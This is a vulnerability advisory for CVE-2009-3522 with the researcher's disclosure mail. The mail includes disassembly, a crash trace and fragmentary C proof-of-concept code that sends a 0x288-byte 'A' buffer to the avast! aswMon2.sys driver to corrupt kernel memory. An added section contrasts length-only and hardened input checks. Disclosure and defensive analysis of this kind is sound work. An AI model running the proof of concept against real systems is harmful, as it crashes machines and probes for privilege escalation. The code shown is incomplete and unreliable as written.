Category:   Application (Security)  >   avast!
Vendors:   ALWIL Software
avast! 'aswMon2.sys' IOCTL Memory Corruption Flaw May Let Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1022940
SecurityTracker URL:
CVE Reference:   CVE-2009-3522
Updated:  Oct 6 2009
Original Entry Date:  Sep 24 2009
Impact:   Execution of arbitrary code via local system, Root access via local system, User access via local system
Vendor Confirmed:  Yes  
Version(s): 4.8.1351.0; possibly other versions
Description:   A vulnerability was reported in avast!. A local user may be able to obtain elevated privileges.

A local user can supply a specially crafted B2C80018 IOCTL value to the 'aswMon2.sys' driver to trigger a memory corruption error in the kernel.

The vendor was notified on September 15, 2009.

The original advisory is available at:

Giuseppe 'Evilcry' Bonfa' reported this vulnerability.

Impact:   A local user may be able to obtain elevated privileges on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Avast aswMon2.sys kernel memory corruption and Local Privilege


-----------[Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation]--------->

Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM

***Disclosure Timeline***
Discover Date: Sep 13, 2009  PoC Code: Sep 13, 2009
Vendor Notify: Sep 15, 2009   Vendor Reply: Sep 15, 2009

After various mails about the publishing date were ignored, here is the public disclosure.

Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
	 (untested) Local Privilege Escalation



Avast's aswMon2.sys driver does not sanitize user-supplied input (IOCTL), and this leads to a kernel memory corruption that propagates
on the system with a BSOD and a potential risk of privilege escalation.

00010F70    cmp     [ebp+arg_C], 288h   ;InBuff Len no other checks performed
00010F77    jnz     loc_111AC
00010F7D    mov     esi, [ebp+SourceString]
00010F80    cmp     [esi], ebx
00010F82    mov     [ebp+arg_C], ebx

Affected IOCTL is B2C80018


Transfer Type: METHOD_BUFFERED


WARNING: Stack unwind information not available. Following frames may be wrong.
f76f3234 8053d251 f76f3250 00000000 f76f32a4 nt+0x600fa
f76f32a4 8052c712 badb0d00 20a0a0a1 f76f5658 nt+0x66251
f76f3328 8052c793 41414141 00000000 f76f377c nt+0x55712
f76f33a4 804fc700 f76f377c f76f3478 05050505 nt+0x55793

f76f56d8 f7756a04 badb0d00 8055b256 00000000 nt+0x66251
f76f576c 41414141 41414141 41414141 41414141 aswMon2+0xa04
f76f5770 41414141 41414141 41414141 41414141 0x41414141
f76f5774 41414141 41414141 41414141 41414141 0x41414141
f76f5778 41414141 41414141 41414141 41414141 0x41414141
f76f577c 41414141 41414141 41414141 41414141 0x41414141
f76f5780 41414141 41414141 41414141 41414141 0x41414141


/* Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry _AT_ gmail _DOT_ com
 * Website:
 *
 * Vendor: Notified
 * No L.P.E. for kiddies
 */

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>

BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
	WCHAR DeviceName[MAX_PATH];
	HANDLE hDevice;

	if ((GetVersion() & 0xFF) >= 5)
		wcscpy(DeviceName, L"\\\\.\\Global\\");
	}
	else
		wcscpy(DeviceName, L"\\\\.\\");

	wcscat(DeviceName, DriverName);

	printf("Opening.. %S\n", DeviceName);

	hDevice = CreateFileW(DeviceName, GENERIC_READ |

	if (hDevice == INVALID_HANDLE_VALUE)
		printf("CreateFile() ERROR %d\n", GetLastError());
		return FALSE;

	*lphDevice = hDevice;

	return TRUE;

int main()
	HANDLE hDev = NULL;
	DWORD Junk;

		printf("Unable to access aswMon");

	char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE |

	if (Buff)
		memset(Buff, 'A', 0x288);
		printf("DeviceIoControl Executed..\n");
	}
		printf("VirtualAlloc() ERROR %d\n", GetLastError());



Giuseppe 'Evilcry' Bonfa'
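As an added, defender-side illustration that is not part of the advisory or of the author's code: the listing above only compares the input length against 0x288 before the buffer is used. The portable C below models that length-only check beside a hardened check that also requires the embedded string to be terminated inside the buffer, which is the validation a METHOD_BUFFERED handler needs before passing user data to string routines. The input layout (a UTF-16 string filling the 0x288-byte frame, suggested by the "SourceString" name in the listing) and all function names are assumptions for illustration; the advisory does not document the real structure.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Expected METHOD_BUFFERED input size for the affected IOCTL, from the listing (cmp ..., 288h). */
#define ASWMON_IN_LEN 0x288u

/* Hypothetical input layout, assumed for illustration only: the IDA name
 * "SourceString" suggests the buffer is consumed as a wide string, but the
 * advisory does not document the real structure. */
typedef struct {
    uint16_t path[ASWMON_IN_LEN / sizeof(uint16_t)];
} aswmon_input_t;

/* Weak check, modelled on the listing: only the length is compared against 0x288. */
bool ioctl_check_length_only(const void *buf, size_t in_len) {
    return buf != NULL && in_len == ASWMON_IN_LEN;
}

/* Hardened check: the length must match AND the embedded string must be
 * NUL-terminated inside the buffer, so string routines cannot walk past it. */
bool ioctl_check_hardened(const void *buf, size_t in_len) {
    aswmon_input_t in;
    if (buf == NULL || in_len != sizeof in)
        return false;
    memcpy(&in, buf, sizeof in);        /* copy the user buffer out before validating */
    for (size_t i = 0; i < sizeof in.path / sizeof in.path[0]; i++)
        if (in.path[i] == 0)
            return true;                /* terminator found within bounds */
    return false;                       /* unterminated: reject before any use */
}

/* Constructed sample: 0x288 bytes of 'A', the pattern seen as 0x41414141 in the crash trace. */
bool demo_all_A_rejected(void) {
    unsigned char buf[ASWMON_IN_LEN];
    memset(buf, 'A', sizeof buf);
    /* the length-only check accepts it; the hardened check rejects it */
    return ioctl_check_length_only(buf, sizeof buf) && !ioctl_check_hardened(buf, sizeof buf);
}

/* Constructed sample: a terminated UTF-16 string in the same 0x288-byte frame. */
bool demo_terminated_accepted(void) {
    unsigned char buf[ASWMON_IN_LEN];
    const char *s = "C:\\example.txt";
    memset(buf, 0, sizeof buf);
    for (size_t i = 0; s[i] != '\0'; i++)
        buf[2 * i] = (unsigned char)s[i];   /* ASCII -> little-endian UTF-16 */
    /* accepted at the right length, rejected when the length is wrong */
    return ioctl_check_hardened(buf, sizeof buf) && !ioctl_check_hardened(buf, 0x100);
}
```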

